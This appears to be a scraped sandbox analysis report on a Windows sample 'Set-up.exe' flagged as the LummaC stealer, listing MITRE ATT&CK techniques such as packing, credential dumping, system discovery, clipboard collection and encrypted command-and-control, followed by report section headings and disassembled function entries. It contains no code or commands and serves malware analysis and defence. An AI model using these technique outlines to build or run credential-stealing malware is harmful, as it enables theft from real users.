Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Windows Analysis Report
Set-up.exe

Function 0915CC75 Relevance: 30.2, Strings: 24, Instructions: 243
COMMON

Function 09187CF0 Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 574
memorycomCOMMON

Function 092C1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Function 09160247 Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 700
COMMON

Function 01ED0341 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399
threadCOMMON

Function 09159C6F Relevance: 6.4, Strings: 5, Instructions: 150
COMMON

Function 01ED0A51 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 09171570 Relevance: 5.6, Strings: 4, Instructions: 586
COMMON

Function 09176520 Relevance: 4.1, Strings: 3, Instructions: 380
COMMON

Function 0915A8B0 Relevance: 4.1, Strings: 3, Instructions: 349
COMMON

Function 0917CE60 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 392
COMMON

Function 0915E042 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 327
COMMON

Function 091586C0 Relevance: 6.1, APIs: 4, Instructions: 93
threadCOMMON